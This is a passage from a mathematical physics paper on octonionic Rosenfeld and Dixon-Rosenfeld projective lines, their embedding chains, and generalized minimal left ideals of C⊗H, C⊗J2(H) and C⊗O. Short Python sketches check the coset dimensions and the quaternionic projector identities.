generally carry an enhancement of the symmetry with respect to the Lie algebra \(\mathfrak{der}\left(\mathbb{A}\otimes\mathbb{O}\right)\simeq\mathfrak{der}\left( \mathbb{A}\right)\oplus\mathfrak{g}_{2}\). Geometrically, the octonionic projective lines \(\left(\mathbb{A}\otimes\mathbb{O}\right)P^{1}\) can be regarded as \(\mathbb{A}\otimes\mathbb{O}\) together with a point at infinity, and thus as a \(8\mathrm{dim}_{\mathbb{R}}\mathbb{A}\)-sphere, namely as a maximal totally geodesic sphere in the corresponding octonionic Rosenfeld projective plane \(\left(\mathbb{A}\otimes\mathbb{O}\right)P^{2}\)[11]. In the case \(\mathbb{A}=\mathbb{R}\), such a "spherical characterization" of octonionic projective lines is well known, whereas for the other cases (the "genuinely Rosenfeld" ones) it is less trivial (see e.g. [24]). 
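The dimension bookkeeping behind these coset realizations, and behind the checks of Section II.4, can be reproduced with elementary arithmetic. The short sketch below uses \(\dim SO(n)=n(n-1)/2\), \(\dim SU(2)=3\), \(\dim G_{2}=14\), and \(\dim U(1)=1\), and confirms that each quotient has the real dimension of the corresponding tensor algebra (8, 16, 32, 64 for the octonionic Rosenfeld lines, and 64 for each Dixon-Rosenfeld line). It is only a numerical cross-check of dimensions already stated in the text.

```python
# Numerical cross-check of the coset dimensions quoted in the text.
def so(n):          # dim SO(n)
    return n * (n - 1) // 2

SU2, U1, G2 = 3, 1, 14

rosenfeld_lines = {
    "(R x O)P^1 = SO_9 / SO_8":                  so(9) - so(8),             # dim R(x)O = 8
    "(C x O)P^1 = SO_10 / (SO_8 x U_1)":         so(10) - so(8) - U1,       # 16
    "(H x O)P^1 = SO_12 / (SO_8 x SU_2 x SU_2)": so(12) - so(8) - 2 * SU2,  # 32
    "(O x O)P^1 = SO_16 / (SO_8 x SO_8)":        so(16) - 2 * so(8),        # 64
}

dixon_lines = {
    # isometry minus isotropy dimensions, as in Eqs. (33), (39), (44)
    "T P^1_I":   (SU2 + so(9) + 7 * 9) - (SU2 + so(7) + 7 + 7),
    "T P^1_II":  (so(7) + SU2 + 8 * 8) - (so(7) + SU2),
    "T P^1_III": (G2 + so(5) + 15 * 5) - (G2 + SU2 + 15 + 3),
}

for name, dim in {**rosenfeld_lines, **dixon_lines}.items():
    print(f"{name}: {dim}")
```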
We can now study the relations among the Dixon-Rosenfeld lines discussed above and the octonionic Rosenfeld lines. Since \[\mathsf{isom}\left(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{16}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{9} \oplus\left(\mathbf{7},\mathbf{9}\right)\] \[=\mathfrak{g}_{2}\oplus\mathfrak{so}_{9}\oplus\left(\mathbf{7}, \mathbf{9}\right)\oplus\left(\mathbf{7},\mathbf{1}\right)\] \[=\mathfrak{su}_{2}\oplus\mathfrak{so}_{9}\oplus\left(\mathbf{7},\mathbf{9}\right)\oplus\left(\mathbf{7},\mathbf{1}\right)\oplus\left( \mathbf{11},\mathbf{1}\right)\] \[\simeq\mathsf{isom}\left(\mathbb{T}P^{1}_{I}\right)\oplus\left( \mathbf{7},\mathbf{1}\right)\oplus\left(\mathbf{11},\mathbf{1}\right), \tag{51}\] we then have that the first Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{I}\) it is properly embedded in the octooctonionic plane \(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\). On the other hand, since \[\mathsf{isom}\left(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{12}=\mathfrak{su}_{2}\oplus\mathfrak{so}_{9} \oplus\left(\mathbf{3},\mathbf{9}\right), \tag{52}\] \[\mathsf{isom}\left(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{10}=\mathfrak{so}_{9}\oplus\mathbf{9},\] (53) \[\mathsf{isom}\left(\left(\mathbb{R}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{9}=\mathfrak{so}_{9}, \tag{54}\] it is clear that no embedding is possible between the first Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{I}\) and the quateroctonionic plane \(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\), while it hold the proper chain of inclusions \[\mathbb{O}P^{1}\subset\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\subset \mathbb{T}P^{1}_{I}\subset\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}. \tag{55}\] Developing the same line of thought for the second Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{II}\) yields to \[\mathsf{isom}\left(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{16}=\mathfrak{so}_{9}\oplus\mathfrak{so}_{7} \oplus\left(\mathbf{9},\mathbf{7}\right)\] \[=\mathfrak{so}_{9}\oplus\mathfrak{so}_{7}\oplus\left(\mathbf{8}_ {v}+\mathbf{1},\mathbf{7}\right)\oplus\left(\mathbf{8}_{v},\mathbf{1}\right)\] \[=\mathfrak{so}_{7}\oplus\mathfrak{so}_{7}\oplus\left(\mathbf{7} {+}2\cdot\mathbf{1},\mathbf{7}\right)\oplus\left(2\cdot\mathbf{7}+\mathbf{1 },\mathbf{1}\right)\] \[=\mathfrak{so}_{7}\oplus\mathfrak{so}_{2}\oplus\left(\mathbf{7} {+}3\cdot\mathbf{1},\mathbf{7}\right)\oplus\left(2\cdot\mathbf{7}+\mathbf{1 },\mathbf{1}\right)\oplus\left(\mathbf{1},\mathbf{11}\right)\] \[\simeq\mathsf{isom}\left(\mathbb{T}P^{1}_{II}\right)\oplus 2\cdot\left( \mathbf{1},\mathbf{7}\right)\oplus\left(\mathbf{7},\mathbf{1}\right)\oplus \left(\mathbf{1},\mathbf{11}\right), \tag{56}\] which means that is possible an embedding of \(\mathbb{T}P^{1}_{II}\subset\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\). 
On the other hand, since \[\mathsf{isom}\left(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{12}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{5} \oplus\left(\mathbf{7},\mathbf{5}\right)\] \[=\left\{\begin{array}{l}\mathfrak{so}_{7}\oplus\mathfrak{su}_{2} \oplus\left(\mathbf{7},\mathbf{5}\right)\oplus\left(\mathbf{1},\mathbf{7} \right),\\ \text{or}\\ \mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7 }+\mathbf{1},\mathbf{2},\mathbf{2})\oplus\left(\mathbf{7},\mathbf{1}, \mathbf{1}\right)\\ =\mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7}+\mathbf{1},\mathbf{ 3}+\mathbf{1})\oplus\left(\mathbf{7},\mathbf{1}\right),\end{array}\right. \tag{57}\] \[\mathsf{isom}\left(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{10}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{3} \oplus\left(\mathbf{7},\mathbf{3}\right),\] (58) \[\mathsf{isom}\left(\left(\mathbb{R}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{9}=\mathfrak{so}_{7}\oplus\mathfrak{u}_{1} \oplus\mathbf{7}_{+}\oplus\mathbf{7}_{-}, \tag{59}\] no embedding is possible between between the second Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{II}\) and the quateroctonionic plane \(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\) nor the bioctonionic plane \(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\). Therefore we have the following chain of proper inclusions \[\mathbb{O}P^{1}\subset\mathbb{T}P^{1}_{II}\subset\left(\mathbb{O}\otimes \mathbb{O}\right)P^{1}. \tag{60}\] Finally, since the isometry algebra of the third Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{II}\) is given by \[\mathsf{isom}\left(\mathbb{T}P^{1}_{III}\right) \simeq\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus\left(2\cdot \mathbf{7}+\mathbf{1},\mathbf{5}\right) \tag{61}\] \[=\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus\mathfrak{su}_{2} \oplus\left(2\cdot\mathbf{7}{+}2\cdot\mathbf{1},\mathbf{2},\mathbf{2}\right) \oplus\left(2\cdot\mathbf{7}+\mathbf{1},\mathbf{1},\mathbf{1}\right)\] \[=\mathfrak{g}_{2}\oplus\mathfrak{su}_{2,d}\oplus\left(2\cdot \mathbf{7}{+}2\cdot\mathbf{1},\mathbf{3}+\mathbf{1}\right)\oplus\left(2\cdot \mathbf{7}+\mathbf{1},\mathbf{1}\right)\oplus\left(\mathbf{1},\mathbf{3} \right), \tag{62}\] while the isometry Lie algebra of the octoctonionic plane is \[\mathfrak{isom}\left(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{16}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{9} \oplus(\mathbf{7},\mathbf{9})\] \[=\mathfrak{so}_{7}\oplus\mathfrak{so}_{5}\oplus\mathfrak{su}_{2} \oplus\mathfrak{su}_{2}\oplus(\mathbf{1},\mathbf{5},\mathbf{2},\mathbf{2}) \oplus(\mathbf{7},\mathbf{5},\mathbf{1},\mathbf{1})\oplus(\mathbf{7},\mathbf{1 },\mathbf{2},\mathbf{2})\] \[=\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus\mathfrak{su}_{2} \oplus\mathfrak{su}_{2}\oplus(\mathbf{1},\mathbf{5},\mathbf{2},\mathbf{2}) \oplus(\mathbf{7},\mathbf{5},\mathbf{1},\mathbf{1})\oplus(\mathbf{7},\mathbf{1 },\mathbf{2},\mathbf{2})\oplus(\mathbf{7},\mathbf{1},\mathbf{1},\mathbf{1})\] \[=\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus 6\cdot(\mathbf{1}, \mathbf{1})\oplus 4\cdot(\mathbf{1},\mathbf{5})\oplus(\mathbf{7},\mathbf{5}) \oplus 5\cdot(\mathbf{7},\mathbf{1})\,, \tag{63}\] we then have that no embedding is possible between \(\mathbb{T}P^{1}_{III}\) and \((\mathbb{O}\otimes\mathbb{O})\,P^{1}\). 
On the other hand, since \[\mathfrak{isom}\left(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{12}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{5} \oplus(\mathbf{7},\mathbf{5})=\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus( \mathbf{7},\mathbf{5})\oplus(\mathbf{7},\mathbf{1})\,, \tag{64}\] \[\mathfrak{isom}\left(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{10}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{3} \oplus(\mathbf{7},\mathbf{3})=\mathfrak{g}_{2}\oplus\mathfrak{so}_{3}\oplus( \mathbf{7},\mathbf{3})\oplus(\mathbf{7},\mathbf{1})\,,\] (65) \[\mathfrak{isom}\left(\left(\mathbb{R}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{9}=\mathfrak{so}_{7}\oplus\mathfrak{u}_{1}\oplus \mathbf{7}_{+}\oplus\mathbf{7}_{-}=\mathfrak{g}_{2}\oplus\mathfrak{u}_{1} \oplus\mathbf{7}_{+}\oplus\mathbf{7}_{-}\oplus\mathbf{7}_{0}, \tag{66}\] the only chain of proper inclusion is given by \[\mathbb{O}P^{1}\subset\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\subset \mathbb{T}P^{1}_{III}. \tag{67}\] IV Projective lines over \(\mathbb{C}\otimes\mathbb{H}\) via \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) ### Generalized minimal left ideals of \(\mathbb{C}\otimes\mathbb{H}\) In pursuing the Standard Model physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\), Furey started by considering generalized minimal left ideals of \(\mathbb{C}\otimes\mathbb{H}\) and demonstrated how scalar, chiral spinors, vector, and 2-form representations of the Lorentz spacetime group may be identified [15]. Given some algebra \(\mathfrak{g}\), a (generalized) minimal ideal \(\mathfrak{i}\subset\mathfrak{g}\) is a subalgebra where \(m(a,v)\in\mathfrak{i}\) for all \(a\in\mathfrak{g}\) and \(v\in\mathfrak{i}\) with \(m\) as a (generalized) multiplication. The generalized minimal left ideal that Furey considered for spinors from \(\mathfrak{g}=\mathbb{C}\otimes\mathbb{H}\) is \[m_{1}(a,v)=v^{\prime}=avP+a^{*}vP^{*} \tag{68}\] where \(P=(1+Ik)/2\) such that \(P^{*}=(1-Ik)/2\) are projectors satisfying \(P^{2}=P,P^{*2}=P^{*}\), and \(PP^{*}=P^{*}P=0\). The 4-vectors (1-forms) were found as generalized minimal ideals via the the following generalized multiplication, \[m_{2}(a,v)=v^{\prime}=ava^{\dagger}, \tag{69}\] where \(a^{\dagger}=\hat{a}^{*}\) is used just for this subsection when \(a\in\mathbb{C}\otimes\mathbb{H}\), with \(\hat{}\) and \({}^{*}\) denoting the quaternionic and complex conjugate, respectively. The symbol \(\dagger\) is used throughout as a Hermitian conjugate of the algebra, but the explicit mathematical operation will differ depending on the algebra under consideration. The scalars and field strength (2-forms) were found as generalized minimal ideals via the generalized multiplcation below, \[m_{3}(a,v)=v^{\prime}=av\hat{a}. \tag{70}\] Focusing on the spinors, a Dirac spinor \(\psi_{D}\) as an element of \(\mathbb{C}\otimes\mathbb{H}\) is decomposed into left- and right-chiral (Weyl) spinors \(\psi_{L}\) and \(\psi_{R}\) as minimal left ideals with respect to Eq. (68), \[\psi_{L}=v_{1}=\left(c_{1}+c_{3}j\right)P=\frac{1}{2}\left(\left(c_{1,1}+c_{1,2 }I\right)-\left(c_{3,2}-c_{3,1}I\right)i+\left(c_{3,1}+c_{3,2}I\right)j-\left(c _{1,2}-c_{1,1}I\right)k\right),\] \[\psi_{R}=v_{2}=\left(c_{2}-c_{4}j\right)P^{*}=\frac{1}{2}\left(\left(c_{2,1}+c_{ 2,2}I\right)-\left(c_{4,2}-c_{4,1}I\right)i-\left(c_{4,1}+c_{4,2}I\right)j+ \left(c_{2,2}-c_{2,1}I\right)k\right), \tag{71}\] where \(c_{i}\) for \(i=1,\ldots 4\) are complex coefficients \(c_{i}=c_{i,1}+c_{i,2}I\). 
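The projector identities and the left-ideal property just described lend themselves to a direct numerical check. The sketch below (a Python stand-in, not the Mathematica computation referred to below) realizes \(\mathbb{C}\otimes\mathbb{H}\) as an eight-dimensional real algebra with basis \(\{1,i,j,k,I,Ii,Ij,Ik\}\), and verifies that \(P\) and \(P^{*}\) are orthogonal idempotents and that \(\psi_{L}\) is stable under the generalized multiplication \(m_{1}\) of Eq. (68).

```python
# Minimal sketch: C (x) H as an 8-dimensional real algebra with basis
# {1, i, j, k, I, Ii, Ij, Ik}; index = 4*c + q with c in {1, I}, q in {1, i, j, k}.
import numpy as np

# Quaternion unit products: QUAT[a][b] = (index of product, sign)
QUAT = [[(0, 1), (1, 1), (2, 1), (3, 1)],
        [(1, 1), (0, -1), (3, 1), (2, -1)],
        [(2, 1), (3, -1), (0, -1), (1, 1)],
        [(3, 1), (2, 1), (1, -1), (0, -1)]]

def mul(x, y):
    """Product in C (x) H for length-8 real coefficient vectors x, y."""
    out = np.zeros(8)
    for a in range(8):
        for b in range(8):
            ca, qa = divmod(a, 4)
            cb, qb = divmod(b, 4)
            q, sq = QUAT[qa][qb]
            sc = -1 if (ca and cb) else 1      # I * I = -1
            out[4 * (ca ^ cb) + q] += sq * sc * x[a] * y[b]
    return out

def conj_C(x):
    """Complex conjugation: I -> -I, quaternionic units untouched."""
    y = x.copy(); y[4:] *= -1
    return y

e = np.eye(8)
one, i, j, k, I = e[0], e[1], e[2], e[3], e[4]
P, Pstar = (one + mul(I, k)) / 2, (one - mul(I, k)) / 2

assert np.allclose(mul(P, P), P) and np.allclose(mul(Pstar, Pstar), Pstar)
assert np.allclose(mul(P, Pstar), 0) and np.allclose(mul(Pstar, P), 0)

rng = np.random.default_rng(1)
c = rng.normal(size=4)                                        # components of complex c1, c3
psi_L = mul(c[0]*one + c[1]*I + c[2]*j + c[3]*mul(I, j), P)   # psi_L = (c1 + c3 j) P
assert np.allclose(mul(psi_L, P), psi_L) and np.allclose(mul(psi_L, Pstar), 0)

a = rng.normal(size=8)                                        # arbitrary element of C (x) H
m1 = mul(mul(a, psi_L), P) + mul(mul(conj_C(a), psi_L), Pstar)
assert np.allclose(mul(m1, P), m1)                            # m1(a, psi_L) stays in the ideal
print("projector and left-ideal checks passed")
```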
Since \(\mathbb{C}\otimes\mathbb{H}\) is associative, it is straightforward to verify that \(\psi_{L}P=\psi_{L},\psi_{R}P^{*}=\psi_{R}\), and \(\psi_{L}P^{*}=\psi_{R}P=0\). Additionally, the Lorentz transformations can be found as the exponentiation of linear combinations of vectors and bivectors of \(Cl(3)\). The basis of minimal ideals is less clear with \(\mathbb{C}\otimes\mathbb{H}\) and improved with reference to another basis spanned by \(\{P,P^{*},jP,jP^{*},IP,IP^{*},IJP,IjP^{*}\}\). To provide a dictionary of various representations used by Furey for the spinor minimal ideal bases [15, 16, 17], consider \[P =[\uparrow L]=|\uparrow\rangle\langle\uparrow|=\epsilon_{\uparrow \uparrow}=\frac{1+Ik}{2},\] \[P^{*} =[\downarrow R]=|\downarrow\rangle\langle\downarrow|=\epsilon_{ \downarrow\downarrow}=\frac{1-Ik}{2},\] \[jP =[\downarrow L]=|\downarrow\rangle\langle\uparrow|=\epsilon_{ \downarrow\uparrow}=\frac{j+Ii}{2}=\alpha, \tag{72}\] \[jP^{*} =-jP^{*} =[\uparrow R]=|\uparrow\rangle\langle\downarrow|=\epsilon_{ \uparrow\downarrow}=\frac{-j+Ii}{2}=\alpha^{\dagger}.\] We found it convenient to confirm that \(\psi_{L}\) and \(\psi_{R}\) are minimal left ideals in Mathematica when converting to the basis above (along with the four elements multiplied by \(I\) ). The following anti-commutation relations can be found, \[\begin{split}\left\{\alpha,\alpha^{\dagger}\right\}& =1,\\ \left\{\alpha,\alpha\right\}&=0,\\ \left\{\alpha^{\dagger},\alpha^{\dagger}\right\}& =0.\end{split} \tag{73}\] Note that \(Ii\) and \(Ij\) act as bases of \(\mathbb{C}l(2)\). ### Generalized minimal left ideals of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) To build up to projective lines of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\), the physics of spinors for \(\mathbb{C}\otimes\mathbb{H}\) are uplifted to \(\mathbb{C}\otimes J_{2}(\mathbb{H})\). The \(\mathbb{C}\otimes\mathbb{H}\) spinors are also embedded into \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) by placing \(\psi_{D}\) in the upper-right component and adding by its quaternionic Hermitian conjugate to obtain an element of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\), \[\psi_{D}\to J\left(\psi_{D}\right)\equiv\left(\begin{array}{cc}0&\psi_{D}\\ 0&0\end{array}\right)+\left(\begin{array}{cc}0&\psi_{D}\\ 0&0\end{array}\right)^{\dagger}=\left(\begin{array}{cc}0&\psi_{D}\\ \hat{\psi}_{D}&0\end{array}\right). \tag{74}\] Note that here \(\dagger\) denotes matrix transpose and quaternionic conjugation. This brings in a complication for generalizing \(P\), as \(2\times 2\) matrices admit two projectors as idempotents, yet \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) does not contain \(P=(1+Ik)/2\) on any diagonal elements. The action of \(\mathbb{C}\otimes\mathbb{H}\) must occur on the off-diagonals. 
Despite not giving projectors, the bases are embedded as follows \[P \to J_{P}\equiv J(P)=\left(\begin{array}{cc}0&P\\ \hat{P}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&1+Ik\\ 1-Ik&0\end{array}\right),\] \[P^{*} \to J_{P^{*}}\equiv J\left(P^{*}\right)=\left(\begin{array}{cc}0 &P^{*}\\ P^{\dagger}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&1-Ik\\ 1+Ik&0\end{array}\right),\] \[jP \to J_{jP}\equiv J(jP)=\left(\begin{array}{cc}0&jP\\ -jP&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&j+Ii\\ -j-Ii&0\end{array}\right), \tag{75}\] \[\hat{j}P^{*} \to J_{jP^{*}}\equiv J\left(jP^{*}\right)=\left(\begin{array}{ cc}0&\hat{j}P^{*}\\ jP^{*}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&-j+Ii\\ j-Ii&0\end{array}\right).\] A new generalized multiplication was identified for spinors as elements of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) by taking the Jordan product with two matrices from the right to replace \(P\) and \(P^{*}\) in Eq. (68), \[m_{4}(a,v)=2\left[((A\circ v)\circ J_{P^{*}})\circ J_{P}-((A\circ v)\circ J_{ jP^{*}})\circ J_{jP}+((A\circ v)\circ J_{P})\circ J_{P^{*}}-((A\circ v)\circ J _{jP})\circ J_{j^{*}}\right]. \tag{76}\] where \(a\in\mathbb{C}\otimes J_{2}(\mathbb{H})\) and \(a\circ b=(ab+ba)/2\) is the Jordan product. We verified in Mathematica that \(m_{4}(a,v)\) gives spinorial ideals for arbitrary \(a\in\mathbb{C}\otimes J_{2}(\mathbb{H})\). Since \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) is larger than the piece of \(\mathbb{C}\otimes\mathbb{H}\) embedded in \(\mathbb{C}\otimes J_{2}(\mathbb{H})\), the existence of such a generalized ideal may hold for the entire algebra constructed from the Dixon-Rosenfeld line via the Freudenthal-Tits construction. For Hermitian and anti-Hermitian vectors, the following generalized multiplication rule is found, \[m_{5}(a,v)=(a\circ v)\circ\hat{a}^{*}+a\circ(v\circ\hat{a}^{*})\,, \tag{77}\] where \(m_{5}\) is identified as a Jordan anti-associator. If \(a\) is chosen to be a purely off-diagonal element of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\), then \(m_{5}\) leads to an element of \(\mathfrak{i}\) for \(v\) as a Hermitian or anti-Hermitian vector. If \(a\) is chosen as an arbitrary element of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\), then the Hermitian vector uplifted to \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) develops a purely real diagonal term, while the antiHermitian vector uplifted develops a purely imaginary diagonal term. It is also anticipated that diagonals of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) not found in \(\mathbb{C}\otimes\mathbb{H}\) should be purely bosonic, which motivates a higher-dimensional Hermitian and anti-Hermitian vector to be found as ideals of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\). For scalars and two-forms, the following generalized multiplication rule is found with a Jordan anti-associator and slightly different conjugation, \[m_{6}(a,v)=(a\circ v)\circ\hat{a}+a\circ(v\circ\hat{a}). \tag{78}\] It turns out that the 2-form uplifted to \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) is a minimal ideal, while the scalar uplifted must be generalized to include a complex diagonal. For concreteness, the left- and right-chiral spinors embedded in \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) as minimal ideals of \(m_{4}\) in Eq. 
(76) are \[J_{\psi_{L}} =\left(\begin{array}{cc}0&(c_{1}+c_{3}j)\,P\\ c_{1}P^{*}-c_{3}P&0\end{array}\right) \tag{79}\] \[J_{\psi_{R}} =\left(\begin{array}{cc}0&(c_{2}-c_{4}j)\,P^{*}\\ c_{2}P+c_{4}P^{*}&0\end{array}\right).\] The vectors \(h\) and pseudo-vectors \(g\) embedded in \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) to be used with Eq. (77) are generalized to the following minimal ideals with diagonal components \[J_{h} =\left(\begin{array}{cc}h_{4}&h_{0}I+h_{1}i+h_{2}j+h_{3}k\\ h_{0}I-h_{1}i-h_{2}j-h_{3}k&h_{5}\end{array}\right), \tag{80}\] \[J_{g} =\left(\begin{array}{cc}g_{4}I&g_{0}+g_{1}iI+g_{2}jI+g_{3}kI \\ g_{0}-g_{1}iI-g_{2}jI-g_{3}kI\end{array}\right).\] The scalars \(\phi\) and 2-forms \(F\) embedded in \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) with Eq. (78) are found as minimal ideals when a complex diagonal is added to the scalars \[J_{\phi} =\left(\begin{array}{cc}\phi_{3}+\phi_{4}I&\phi_{1}+\phi_{2}I \\ \phi_{1}-\phi_{2}I&\phi_{5}+\phi_{6}I\end{array}\right), \tag{81}\] \[J_{F} =\left(\begin{array}{cc}0&F^{32}i+F^{13}j+F^{21}k+F^{01}iI+F^{ 02}jI+F^{03}kI\\ -F^{32}i-F^{13}j-F^{21}k-F^{01}iI-F^{02}jI-F^{03}kI&0\end{array}\right).\] One may anticipate that the vector, spinor, and conjugate spinor representations can be embedded in the three independent off-diagonal components of \(\mathbb{C}\otimes J_{3}(\mathbb{H})\), but this is left for future work. ## V Projective lines over \(\mathbb{C}\otimes\mathbb{O}\) via \(\mathbb{C}\otimes J_{2}(\mathbb{O})\) Minimal left ideals of \(\mathbb{C}l(6)\) via chain algebra \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\) To establish our conventions for octonions, we review the complexification of the octonionic chain algebra applied to raising and lowering operators for \(SU(3)_{c}\times U(1)_{em}\) fermionic charge states [14, 15]. For \(\mathbb{C}\otimes\mathbb{O}\), we use \(I\) and \(e_{i}\) for \(i=1,\ldots,7\) as the imaginary units. To convert from Furey's octonionic basis to ours, take \(\{e_{1},e_{2},e_{3},e_{4},e_{5},e_{6},e_{7}\}\rightarrow\{e_{2},e_{3},e_{6},e _{1},e_{5},e_{7},-e_{4}\}\). A system of ladder operators was constructed from the complexification of the octonionic chain algebra \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\cong\mathbb{C}l(6)\), which allows contact with \(SU(3)_{c}\times U(1)_{em}\)[14]. Due to the nonassociative nature of the octonions, the following association of multiplication is always assumed, where an arbitrary element \(f\in\mathbb{C}\otimes\mathbb{O}\) must be considered, \[\{\alpha_{i},\alpha_{j}\}:=\{\alpha_{i},\alpha_{j}\}\,f=\alpha_{i}\,(\alpha_{ j}f)+\alpha_{j}\,(\alpha_{i}f)\,. \tag{82}\] If \(a^{*}\) refers to complex conjugation and \(\tilde{a}\) refers to octonionic conjugation, denote \(a^{\dagger}=\tilde{a}^{*}\) as the Hermitian conjugate only when acting on \(a\in\mathbb{C}\otimes\mathbb{O}\). 
Our basis of raising and lowering operators is chosen as \[\alpha_{1}=q_{1} =\frac{1}{2}\left(-e_{5}+Ie_{1}\right), \alpha_{1}^{\dagger}=-q_{1}^{*} =\frac{1}{2}\left(e_{5}+Ie_{1}\right),\] \[\alpha_{2}=q_{2} =\frac{1}{2}\left(-e_{6}+Ie_{2}\right), \alpha_{2}^{\dagger}=-q_{2}^{*} =\frac{1}{2}\left(e_{6}+Ie_{2}\right), \tag{83}\] \[\alpha_{3}=q_{3} =\frac{1}{2}\left(-e_{7}+Ie_{3}\right), \alpha_{3}^{\dagger}=-q_{3}^{*} =\frac{1}{2}\left(e_{7}+Ie_{3}\right).\] With this basis, we explicitly confirmed in Mathematica that the following relations hold, \[\begin{split}\left\{\alpha_{i},\alpha_{j}^{\dagger}\right\}f& =\delta_{ij}f,\\ \left\{\alpha_{i},\alpha_{j}\right\}f&=0,\\ \left\{\alpha_{i}^{\dagger},\alpha_{j}^{\dagger}\right\}f& =0\end{split} \tag{84}\] It was also confirmed that \(\{\alpha_{i}^{*},\tilde{\alpha}_{j}\}=\delta_{ij}\). For later convenience, a leptonic sector of operators is also introduced as \[\alpha_{0}=Il^{*}=\frac{1}{2}\left(-e_{4}+I\right),\qquad\tilde{\alpha}_{0}= Il=\frac{1}{2}\left(e_{4}+I\right). \tag{85}\] Due to the non-associativity of octonions, acting from the left once does not span all of the possible transformations, which motivates nested multiplication. This naturally motivates \(\mathbb{C}\otimes\overleftarrow{\mathbb{C}}\) as the octonionic chain algebra corresponding to \(\mathbb{C}l(6)\). This chooses \(-e_{4}\) as a pseudoscalar, such that the \(k\)-vector decomposition of \(\mathbb{C}l(6)\) is spanned by \(1\)-vectors \(\{Ie_{2},Ie_{3},Ie_{6},Ie_{1},Ie_{5},Ie_{7}\}\). Next, a nilpotent object \(\omega=\alpha_{1}\alpha_{2}\alpha_{3}\) is introduced, where the parentheses of the chain algebra mentioned above is assumed below. The Hermitian conjugate is \(\omega^{\dagger}=\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\alpha_{1}^{\dagger}\). The state \(v_{c}=\omega\omega^{\dagger}\) is considered roughly as a vacuum state (perhaps renormalized with weak isospin up), since \(\alpha_{i}\omega\omega^{\dagger}=0\). Fermionic charge states of isospin up are identified as minimal left ideals via \[\begin{split} S^{u}\equiv&\qquad\qquad\qquad\nu \omega\omega^{\dagger}\\ +\bar{d}^{r}\alpha_{1}^{\dagger}\omega\omega^{\dagger}& +\bar{d}^{g}\alpha_{1}^{\dagger}\omega\omega^{\dagger}&+\bar{d}^{b} \alpha_{3}^{\dagger}\omega\omega^{\dagger}\\ +u^{r}\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\omega\omega^{ \dagger}&+u^{g}\alpha_{1}^{\dagger}\alpha_{3}^{\dagger}\omega \omega^{\dagger}&+u^{b}\alpha_{2}^{\dagger}\alpha_{1}^{\dagger} \omega\omega^{\dagger}\\ +\bar{e}\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\alpha_{1}^{ \dagger}\omega\omega^{\dagger}\end{split}\, \tag{86}\] where \(\nu,\bar{d}^{r},u^{i}\), and \(\bar{e}\) are complex coefficients. The weak isospin down states are found by building off of \(v_{c}^{*}=\omega^{\dagger}\omega\), giving 